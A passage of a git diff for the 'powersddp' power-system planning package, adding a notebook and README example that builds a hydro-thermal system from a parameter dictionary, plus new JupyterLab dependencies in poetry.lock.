+ "print(\"System Load: {}\\n\"\n",
+ " \"Number of HGUs: {}\\n\"\n",
+ " \"Number of TGUs: {}\".format(system.data['load'],\n",
+ " len(system.data['hydro-units']),\n",
+ " len(system.data['thermal-units'])))"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 1,
+ "id": "07837a84-da91-47bf-a749-d4292fde6d57",
+ "metadata": {},
+ "outputs": [
+ {
+ "name": "stdout",
+ "output_type": "stream",
+ "text": [
+ "System Load: [50, 50, 50]\n",
+ "Number of HGUs: 1\n",
+ "Number of TGUs: 2\n"
+ ]
+ }
+ ],
+ "source": [
+ "import powersddp\n",
+ "\n",
+ "payload = {'load': [50, 50, 50],\n",
+ " 'discretizations': 3,\n",
+ " 'stages': 3,\n",
+ " 'scenarios': 2,\n",
+ " 'outage_cost': 500,\n",
+ " 'hydro-units': [{'name': 'HU1',\n",
+ " 'v_max': 100,\n",
+ " 'v_min': 20,\n",
+ " 'prod': 0.95,\n",
+ " 'flow_max': 60,\n",
+ " 'inflow_scenarios': [[23, 16],\n",
+ " [19, 14],\n",
+ " [15, 11]]}],\n",
+ " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
+ " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
+ "\n",
+ "system = powersddp.PowerSystem(data=payload)\n",
+ "\n",
+ "print(\"System Load: {}\\n\"\n",
+ " \"Number of HGUs: {}\\n\"\n",
+ " \"Number of TGUs: {}\".format(system.data['load'],\n",
+ " len(system.data['hydro-units']),\n",
+ " len(system.data['thermal-units'])))"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": null,
+ "id": "db680eea-a46e-4f24-a739-aae4117bb19e",
+ "metadata": {},
+ "outputs": [],
+ "source": []
+ }
+ ],
+ "metadata": {
+ "kernelspec": {
+ "display_name": "Python 3 (ipykernel)",
+ "language": "python",
+ "name": "python3"
+ },
+ "language_info": {
+ "codemirror_mode": {
+ "name": "ipython",
+ "version": 3
+ },
+ "file_extension": ".py",
+ "mimetype": "text/x-python",
+ "name": "python",
+ "nbconvert_exporter": "python",
+ "pygments_lexer": "ipython3",
+ "version": "3.8.6"
+ }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 5
+}
diff --git a/README.md b/README.md
index e200220..9294885 100644
--- a/README.md
+++ b/README.md
@@ -18,4 +18,52 @@ A special thank should be given to professor **André Marcato**. This project do
pip install powersddp
```
+## Example
+
+There are two ways of initializing a `Power System`: either by providing a `.yml` file or by passing a dictionary as initialization data. Both are depicted below:
+
+> **Note:** When using the file input method (`.yml` format), see the [example](system.yml) for how to declare the parameters.
+
+
+### Initializing a `PowerSystem`
+```Python
+import powersddp
+
+system = powersddp.PowerSystem(path='system.yml')
+
+print("System Load: {}\n"
+ "Number of HGUs: {}\n"
+ "Number of TGUs: {}".format(system.data['load'],
+ len(system.data['hydro-units']),
+ len(system.data['thermal-units'])))
+```
+
+```Python
+import powersddp
+
+payload = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16],
+ [19, 14],
+ [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+system = powersddp.PowerSystem(data=payload)
+
+print("System Load: {}\n"
+ "Number of HGUs: {}\n"
+ "Number of TGUs: {}".format(system.data['load'],
+ len(system.data['hydro-units']),
+ len(system.data['thermal-units'])))
+```
+
<!-- <img src="https://render.githubusercontent.com/render/math?math=e^{i \pi} = -1"> -->
diff --git a/poetry.lock b/poetry.lock
index ab3d041..7944ec3 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -1,3 +1,20 @@
+[[package]]
+name = "anyio"
+version = "3.3.0"
+description = "High level compatibility layer for multiple asynchronous event loop implementations"
+category = "dev"
+optional = false
+python-versions = ">=3.6.2"
+
+[package.dependencies]
+idna = ">=2.8"
+sniffio = ">=1.1"
+
+[package.extras]
+doc = ["sphinx-rtd-theme", "sphinx-autodoc-typehints (>=1.2.0)"]
+test = ["coverage[toml] (>=4.5)", "hypothesis (>=4.0)", "pytest (>=6.0)", "pytest-mock (>=3.6.1)", "trustme", "uvloop (<0.15)", "mock (>=4)", "uvloop (>=0.15)"]
+trio = ["trio (>=0.16)"]
+
[[package]]
name = "appdirs"
version = "1.4.4"
@@ -6,6 +23,31 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "appnope"
+version = "0.1.2"
+description = "Disable App Nap on macOS >= 10.9"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "argon2-cffi"
+version = "20.1.0"
+description = "The secure Argon2 password hashing algorithm."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+cffi = ">=1.0.0"
+six = "*"
+
+[package.extras]
+dev = ["coverage[toml] (>=5.0.2)", "hypothesis", "pytest", "sphinx", "wheel", "pre-commit"]
+docs = ["sphinx"]
+tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pytest"]
+
[[package]]
name = "astroid"
version = "2.6.6"
@@ -18,6 +60,14 @@ python-versions = "~=3.6"
lazy-object-proxy = ">=1.4.0"
wrapt = ">=1.11,<1.13"
+[[package]]
+name = "async-generator"
+version = "1.10"
+description = "Async generators and context managers for Python 3.5+"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
[[package]]
name = "atomicwrites"
version = "1.4.0"
@@ -40,6 +90,25 @@ docs = ["furo", "sphinx", "zope.interface", "sphinx-notfound-page"]
tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface"]
tests_no_zope = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins"]
+[[package]]
+name = "babel"
+version = "2.9.1"
+description = "Internationalization utilities"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+
+[package.dependencies]
+pytz = ">=2015.7"
+
+[[package]]
+name = "backcall"
+version = "0.2.0"
+description = "Specifications for callback functions passed in to an API"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "black"
version = "21.7b0"
@@ -62,6 +131,49 @@ d = ["aiohttp (>=3.6.0)", "aiohttp-cors (>=0.4.0)"]
python2 = ["typed-ast (>=1.4.2)"]
uvloop = ["uvloop (>=0.15.2)"]
+[[package]]
+name = "bleach"
+version = "4.0.0"
+description = "An easy safelist-based HTML-sanitizing tool."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+packaging = "*"
+six = ">=1.9.0"
+webencodings = "*"
+
+[[package]]
+name = "certifi"
+version = "2021.5.30"
+description = "Python package for providing Mozilla's CA Bundle."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "cffi"
+version = "1.14.6"
+description = "Foreign Function Interface for Python calling C code."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+pycparser = "*"
+
+[[package]]
+name = "charset-normalizer"
+version = "2.0.4"
+description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
+category = "dev"
+optional = false
+python-versions = ">=3.5.0"
+
+[package.extras]
+unicode_backport = ["unicodedata2"]
+
[[package]]
name = "click"
version = "8.0.1"
@@ -81,6 +193,114 @@ category = "dev"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
+[[package]]
+name = "cvxopt"
+version = "1.2.6"
+description = "Convex optimization package"
+category = "main"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "debugpy"
+version = "1.4.1"
+description = "An implementation of the Debug Adapter Protocol for Python"
+category = "dev"
+optional = false
+python-versions = ">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*"
+
+[[package]]
+name = "decorator"
+version = "5.0.9"
+description = "Decorators for Humans"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[[package]]
+name = "defusedxml"
+version = "0.7.1"
+description = "XML bomb protection for Python stdlib modules"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
+
+[[package]]
+name = "entrypoints"
+version = "0.3"
+description = "Discover and load entry points from installed packages."
+category = "dev"
+optional = false
+python-versions = ">=2.7"
+
+[[package]]
+name = "idna"
+version = "3.2"
+description = "Internationalized Domain Names in Applications (IDNA)"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[[package]]
+name = "ipykernel"
+version = "6.1.0"
+description = "IPython Kernel for Jupyter"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+
+[package.dependencies]
+appnope = {version = "*", markers = "platform_system == \"Darwin\""}
+debugpy = ">=1.0.0,<2.0"
+ipython = ">=7.23.1,<8.0"
+jupyter-client = "<7.0"
+matplotlib-inline = ">=0.1.0,<0.2.0"
+tornado = ">=4.2,<7.0"
+traitlets = ">=4.1.0,<6.0"
+
+[package.extras]
+test = ["pytest (!=5.3.4)", "pytest-cov", "flaky", "nose", "ipyparallel"]
+
+[[package]]
+name = "ipython"
+version = "7.26.0"
+description = "IPython: Productive Interactive Computing"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+
+[package.dependencies]
+appnope = {version = "*", markers = "sys_platform == \"darwin\""}
+backcall = "*"
+colorama = {version = "*", markers = "sys_platform == \"win32\""}
+decorator = "*"
+jedi = ">=0.16"
+matplotlib-inline = "*"
+pexpect = {version = ">4.3", markers = "sys_platform != \"win32\""}
+pickleshare = "*"
+prompt-toolkit = ">=2.0.0,<3.0.0 || >3.0.0,<3.0.1 || >3.0.1,<3.1.0"
+pygments = "*"
+traitlets = ">=4.2"
+
+[package.extras]
+all = ["Sphinx (>=1.3)", "ipykernel", "ipyparallel", "ipywidgets", "nbconvert", "nbformat", "nose (>=0.10.1)", "notebook", "numpy (>=1.17)", "pygments", "qtconsole", "requests", "testpath"]
+doc = ["Sphinx (>=1.3)"]
+kernel = ["ipykernel"]
+nbconvert = ["nbconvert"]
+nbformat = ["nbformat"]
+notebook = ["notebook", "ipywidgets"]
+parallel = ["ipyparallel"]
+qtconsole = ["qtconsole"]
+test = ["nose (>=0.10.1)", "requests", "testpath", "pygments", "nbformat", "ipykernel", "numpy (>=1.17)"]
+
+[[package]]
+name = "ipython-genutils"
+version = "0.2.0"
+description = "Vestigial utilities from IPython"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "isort"
version = "5.9.3"
@@ -95,6 +315,178 @@ requirements_deprecated_finder = ["pipreqs", "pip-api"]
colors = ["colorama (>=0.4.3,<0.5.0)"]
plugins = ["setuptools"]
+[[package]]
+name = "jedi"
+version = "0.18.0"
+description = "An autocompletion tool for Python that can be used for text editors."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+parso = ">=0.8.0,<0.9.0"
+
+[package.extras]
+qa = ["flake8 (==3.8.3)", "mypy (==0.782)"]
+testing = ["Django (<3.1)", "colorama", "docopt", "pytest (<6.0.0)"]
+
+[[package]]
+name = "jinja2"
+version = "3.0.1"
+description = "A very fast and expressive template engine."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+MarkupSafe = ">=2.0"
+
+[package.extras]
+i18n = ["Babel (>=2.7)"]
+
+[[package]]
+name = "json5"
+version = "0.9.6"
+description = "A Python implementation of the JSON5 data format."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.extras]
+dev = ["hypothesis"]
+
+[[package]]
+name = "jsonschema"
+version = "3.2.0"
+description = "An implementation of JSON Schema validation for Python"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+attrs = ">=17.4.0"
+pyrsistent = ">=0.14.0"
+six = ">=1.11.0"
+
+[package.extras]
+format = ["idna", "jsonpointer (>1.13)", "rfc3987", "strict-rfc3339", "webcolors"]
+format_nongpl = ["idna", "jsonpointer (>1.13)", "webcolors", "rfc3986-validator (>0.1.0)", "rfc3339-validator"]
+
+[[package]]
+name = "jupyter-client"
+version = "6.2.0"
+description = "Jupyter protocol implementation and client libraries"
+category = "dev"
+optional = false
+python-versions = ">=3.6.1"
+
+[package.dependencies]
+jupyter-core = ">=4.6.0"
+nest-asyncio = ">=1.5"
+python-dateutil = ">=2.1"
+pyzmq = ">=13"
+tornado = ">=4.1"
+traitlets = "*"
+
+[package.extras]
+doc = ["sphinx (>=1.3.6)", "sphinx-rtd-theme", "sphinxcontrib-github-alt"]
+test = ["async-generator", "ipykernel", "ipython", "mock", "pytest-asyncio", "pytest-timeout", "pytest", "mypy", "pre-commit", "jedi (<0.18)"]
+
+[[package]]
+name = "jupyter-core"
+version = "4.7.1"
+description = "Jupyter core package. A base package on which Jupyter projects rely."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+pywin32 = {version = ">=1.0", markers = "sys_platform == \"win32\""}
+traitlets = "*"
+
+[[package]]
+name = "jupyter-server"
+version = "1.10.2"
+description = "The backend—i.e. core services, APIs, and REST endpoints—to Jupyter web applications."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+anyio = ">=3.1.0,<4"
+argon2-cffi = "*"
+ipython-genutils = "*"
+jinja2 = "*"
+jupyter-client = ">=6.1.1"
+jupyter-core = ">=4.6.0"
+nbconvert = "*"
+nbformat = "*"
+prometheus-client = "*"
+pyzmq = ">=17"
+requests-unixsocket = "*"
+Send2Trash = "*"
+terminado = ">=0.8.3"
+tornado = ">=6.1.0"
+traitlets = ">=4.2.1"
+websocket-client = "*"
+
+[package.extras]
+test = ["coverage", "pytest (>=6.0)", "pytest-cov", "pytest-mock", "requests", "pytest-tornasync", "pytest-console-scripts", "ipykernel"]
+
+[[package]]
+name = "jupyterlab"
+version = "3.1.6"
+description = "JupyterLab computational environment"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+ipython = "*"
+jinja2 = ">=2.1"
+jupyter-core = "*"
+jupyter-server = ">=1.4,<2.0"
+jupyterlab-server = ">=2.3,<3.0"
+nbclassic = ">=0.2,<1.0"
+packaging = "*"
+tornado = ">=6.1.0"
+
+[package.extras]
+test = ["coverage", "pytest (>=6.0)", "pytest-cov", "pytest-console-scripts", "pytest-check-links (>=0.5)", "jupyterlab-server[test] (>=2.2,<3.0)", "requests", "requests-cache", "virtualenv", "check-manifest"]
+ui-tests = ["build"]
+
+[[package]]
+name = "jupyterlab-pygments"
+version = "0.1.2"
+description = "Pygments theme using JupyterLab CSS variables"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+pygments = ">=2.4.1,<3"
+
+[[package]]
+name = "jupyterlab-server"
+version = "2.7.0"
+description = "A set of server components for JupyterLab and JupyterLab like applications ."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+babel = "*"
+entrypoints = ">=0.2.2"
+jinja2 = ">=2.10"
+json5 = "*"
+jsonschema = ">=3.0.1"
+jupyter-server = ">=1.4,<2.0"
+packaging = "*"
+requests = "*"
+
+[package.extras]
+test = ["codecov", "ipykernel", "pytest (>=5.3.2)", "pytest-cov", "jupyter-server", "openapi-core (>=0.13.8,<0.14.0)", "pytest-console-scripts", "strict-rfc3339", "ruamel.yaml", "wheel"]
+
[[package]]
name = "lazy-object-proxy"
version = "1.6.0"
@@ -103,6 +495,25 @@ category = "dev"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*"
+[[package]]
+name = "markupsafe"
+version = "2.0.1"
+description = "Safely add untrusted strings to HTML/XML markup."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[[package]]
+name = "matplotlib-inline"
+version = "0.1.2"
+description = "Inline Matplotlib backend for Jupyter"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[package.dependencies]
+traitlets = "*"
+
[[package]]
name = "mccabe"
version = "0.6.1"
@@ -111,6 +522,14 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "mistune"
+version = "0.8.4"
+description = "The fastest markdown parser in pure Python"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "more-itertools"
version = "8.8.0"
@@ -144,6 +563,126 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "nbclassic"
+version = "0.3.1"
+description = "Jupyter Notebook as a Jupyter Server Extension."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+jupyter-server = ">=1.8,<2.0"
+notebook = "<7"
+
+[package.extras]
+test = ["pytest", "pytest-tornasync", "pytest-console-scripts"]
+
+[[package]]
+name = "nbclient"
+version = "0.5.3"
+description = "A client library for executing notebooks. Formerly nbconvert's ExecutePreprocessor."
+category = "dev"
+optional = false
+python-versions = ">=3.6.1"
+
+[package.dependencies]
+async-generator = "*"
+jupyter-client = ">=6.1.5"
+nbformat = ">=5.0"
+nest-asyncio = "*"
+traitlets = ">=4.2"
+
+[package.extras]
+dev = ["codecov", "coverage", "ipython", "ipykernel", "ipywidgets", "pytest (>=4.1)", "pytest-cov (>=2.6.1)", "check-manifest", "flake8", "mypy", "tox", "bumpversion", "xmltodict", "pip (>=18.1)", "wheel (>=0.31.0)", "setuptools (>=38.6.0)", "twine (>=1.11.0)", "black"]
+sphinx = ["Sphinx (>=1.7)", "sphinx-book-theme", "mock", "moto", "myst-parser"]
+test = ["codecov", "coverage", "ipython", "ipykernel", "ipywidgets", "pytest (>=4.1)", "pytest-cov (>=2.6.1)", "check-manifest", "flake8", "mypy", "tox", "bumpversion", "xmltodict", "pip (>=18.1)", "wheel (>=0.31.0)", "setuptools (>=38.6.0)", "twine (>=1.11.0)", "black"]
+
+[[package]]
+name = "nbconvert"
+version = "6.1.0"
+description = "Converting Jupyter Notebooks"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+
+[package.dependencies]
+bleach = "*"
+defusedxml = "*"
+entrypoints = ">=0.2.2"
+jinja2 = ">=2.4"
+jupyter-core = "*"
+jupyterlab-pygments = "*"
+mistune = ">=0.8.1,<2"
+nbclient = ">=0.5.0,<0.6.0"
+nbformat = ">=4.4"
+pandocfilters = ">=1.4.1"
+pygments = ">=2.4.1"
+testpath = "*"
+traitlets = ">=5.0"
+
+[package.extras]
+all = ["pytest", "pytest-cov", "pytest-dependency", "ipykernel", "ipywidgets (>=7)", "pyppeteer (==0.2.2)", "tornado (>=4.0)", "sphinx (>=1.5.1)", "sphinx-rtd-theme", "nbsphinx (>=0.2.12)", "ipython"]
+docs = ["sphinx (>=1.5.1)", "sphinx-rtd-theme", "nbsphinx (>=0.2.12)", "ipython"]
+serve = ["tornado (>=4.0)"]
+test = ["pytest", "pytest-cov", "pytest-dependency", "ipykernel", "ipywidgets (>=7)", "pyppeteer (==0.2.2)"]
+webpdf = ["pyppeteer (==0.2.2)"]
+
+[[package]]
+name = "nbformat"
+version = "5.1.3"
+description = "The Jupyter Notebook format"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[package.dependencies]
+ipython-genutils = "*"
+jsonschema = ">=2.4,<2.5.0 || >2.5.0"
+jupyter-core = "*"
+traitlets = ">=4.1"
+
+[package.extras]
+fast = ["fastjsonschema"]
+test = ["check-manifest", "fastjsonschema", "testpath", "pytest", "pytest-cov"]
+
+[[package]]
+name = "nest-asyncio"
+version = "1.5.1"
+description = "Patch asyncio to allow nested event loops"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[[package]]
+name = "notebook"
+version = "6.4.3"
+description = "A web-based notebook environment for interactive computing"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+argon2-cffi = "*"
+ipykernel = "*"
+ipython-genutils = "*"
+jinja2 = "*"
+jupyter-client = ">=5.3.4"
+jupyter-core = ">=4.6.1"
+nbconvert = "*"
+nbformat = "*"
+prometheus-client = "*"
+pyzmq = ">=17"
+Send2Trash = ">=1.5.0"
+terminado = ">=0.8.3"
+tornado = ">=6.1"
+traitlets = ">=4.2.1"
+
+[package.extras]
+docs = ["sphinx", "nbsphinx", "sphinxcontrib-github-alt", "sphinx-rtd-theme", "myst-parser"]
+json-logging = ["json-logging"]
+test = ["pytest", "coverage", "requests", "nbval", "selenium", "pytest-cov", "requests-unixsocket"]
+
[[package]]
name = "packaging"
version = "21.0"
@@ -155,6 +694,26 @@ python-versions = ">=3.6"
[package.dependencies]
pyparsing = ">=2.0.2"
+[[package]]
+name = "pandocfilters"
+version = "1.4.3"
+description = "Utilities for writing pandoc filters in python"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+
+[[package]]
+name = "parso"
+version = "0.8.2"
+description = "A Python Parser"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.extras]
+qa = ["flake8 (==3.8.3)", "mypy (==0.782)"]
+testing = ["docopt", "pytest (<6.0.0)"]
+
[[package]]
name = "pathspec"
version = "0.9.0"
@@ -163,6 +722,25 @@ category = "dev"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7"
+[[package]]
+name = "pexpect"
+version = "4.8.0"
+description = "Pexpect allows easy control of interactive console applications."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+ptyprocess = ">=0.5"
+
+[[package]]
+name = "pickleshare"
+version = "0.7.5"
+description = "Tiny 'shelve'-like database with concurrency support"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "pluggy"
version = "0.13.1"
@@ -174,6 +752,36 @@ python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
[package.extras]
dev = ["pre-commit", "tox"]
+[[package]]
+name = "prometheus-client"
+version = "0.11.0"
+description = "Python client for the Prometheus monitoring system."
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+
+[package.extras]
+twisted = ["twisted"]
+
+[[package]]
+name = "prompt-toolkit"
+version = "3.0.19"
+description = "Library for building powerful interactive command lines in Python"
+category = "dev"
+optional = false
+python-versions = ">=3.6.1"
+
+[package.dependencies]
+wcwidth = "*"
+
+[[package]]
+name = "ptyprocess"
+version = "0.7.0"
+description = "Run a subprocess in a pseudo terminal"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "py"
version = "1.10.0"
@@ -182,6 +790,22 @@ category = "dev"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+[[package]]
+name = "pycparser"
+version = "2.20"
+description = "C parser in Python"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+
+[[package]]
+name = "pygments"
+version = "2.9.0"
+description = "Pygments is a syntax highlighting package written in Python."
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
[[package]]
name = "pylint"
version = "2.9.6"
@@ -205,6 +829,14 @@ category = "dev"
optional = false
python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*"
+[[package]]
+name = "pyrsistent"
+version = "0.18.0"
+description = "Persistent/Functional/Immutable data structures"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
[[package]]
name = "pytest"
version = "5.4.3"
@@ -227,6 +859,61 @@ wcwidth = "*"
checkqa-mypy = ["mypy (==v0.761)"]
testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "requests", "xmlschema"]
+[[package]]
+name = "python-dateutil"
+version = "2.8.2"
+description = "Extensions to the standard Python datetime module"
+category = "dev"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
+
+[package.dependencies]
+six = ">=1.5"
+
+[[package]]
+name = "pytz"
+version = "2021.1"
+description = "World timezone definitions, modern and historical"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "pywin32"
+version = "301"
+description = "Python for Window Extensions"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "pywinpty"
+version = "1.1.3"
+description = "Pseudo terminal support for Windows from Python."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[[package]]
+name = "pyyaml"
+version = "5.4.1"
+description = "YAML parser and emitter for Python"
+category = "main"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*"
+
+[[package]]
+name = "pyzmq"
+version = "22.2.1"
+description = "Python bindings for 0MQ"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+cffi = {version = "*", markers = "implementation_name == \"pypy\""}
+py = {version = "*", markers = "implementation_name == \"pypy\""}
+
[[package]]
name = "regex"
version = "2021.8.3"
@@ -235,6 +922,92 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "requests"
+version = "2.26.0"
+description = "Python HTTP for Humans."
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*"
+
+[package.dependencies]
+certifi = ">=2017.4.17"
+charset-normalizer = {version = ">=2.0.0,<2.1.0", markers = "python_version >= \"3\""}
+idna = {version = ">=2.5,<4", markers = "python_version >= \"3\""}
+urllib3 = ">=1.21.1,<1.27"
+
+[package.extras]
+socks = ["PySocks (>=1.5.6,!=1.5.7)", "win-inet-pton"]
+use_chardet_on_py3 = ["chardet (>=3.0.2,<5)"]
+
+[[package]]
+name = "requests-unixsocket"
+version = "0.2.0"
+description = "Use requests to talk HTTP via a UNIX domain socket"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+requests = ">=1.1"
+urllib3 = ">=1.8"
+
+[[package]]
+name = "send2trash"
+version = "1.8.0"
+description = "Send file to trash natively under Mac OS X, Windows and Linux."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.extras]
+nativelib = ["pyobjc-framework-cocoa", "pywin32"]
+objc = ["pyobjc-framework-cocoa"]
+win32 = ["pywin32"]
+
+[[package]]
+name = "six"
+version = "1.16.0"
+description = "Python 2 and 3 compatibility utilities"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
+
+[[package]]
+name = "sniffio"
+version = "1.2.0"
+description = "Sniff out which async library your code is running under"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[[package]]
+name = "terminado"
+version = "0.11.0"
+description = "Tornado websocket backend for the Xterm.js Javascript terminal emulator library."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+ptyprocess = {version = "*", markers = "os_name != \"nt\""}
+pywinpty = {version = ">=1.1.0", markers = "os_name == \"nt\""}
+tornado = ">=4"
+
+[package.extras]
+test = ["pytest"]
+
+[[package]]
+name = "testpath"
+version = "0.5.0"
+description = "Test utilities for code working with files and commands"
+category = "dev"
+optional = false
+python-versions = ">= 3.5"
+
+[package.extras]
+test = ["pytest", "pathlib2"]
+
[[package]]
name = "toml"
version = "0.10.2"
@@ -251,6 +1024,36 @@ category = "dev"
optional = false
python-versions = ">=3.6"
+[[package]]
+name = "tornado"
+version = "6.1"
+description = "Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed."
+category = "dev"
+optional = false
+python-versions = ">= 3.5"
+
+[[package]]
+name = "traitlets"
+version = "5.0.5"
+description = "Traitlets Python configuration system"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+
+[package.dependencies]
+ipython-genutils = "*"
+
+[package.extras]
+test = ["pytest"]
+
+[[package]]
+name = "types-pyyaml"
+version = "5.4.6"
+description = "Typing stubs for PyYAML"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "typing-extensions"
version = "3.10.0.0"
@@ -259,6 +1062,19 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "urllib3"
+version = "1.26.6"
+description = "HTTP library with thread-safe connection pooling, file post, and more."
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4"
+
+[package.extras]
+brotli = ["brotlipy (>=0.6.0)"]
+secure = ["pyOpenSSL (>=0.14)", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "certifi", "ipaddress"]
+socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"]
+
[[package]]
name = "wcwidth"
version = "0.2.5"
@@ -267,6 +1083,26 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "webencodings"
+version = "0.5.1"
+description = "Character encoding aliases for legacy web content"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "websocket-client"
+version = "1.2.1"
+description = "WebSocket client for Python with low level API options"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.extras]
+optional = ["python-socks", "wsaccel"]
+test = ["websockets"]
+
[[package]]
name = "wrapt"
version = "1.12.1"
@@ -278,17 +1114,49 @@ python-versions = "*"
[metadata]
lock-version = "1.1"
python-versions = "^3.8"
-content-hash = "c518467267a9bf0545c2e27f15dcd22caab4a3ef236b25e979ce6d9af8958b02"
+content-hash = "a80ab2d038ebd23b2a35fddb2e703975351608f10eedf2519677c49d97feb518"
[metadata.files]
+anyio = [
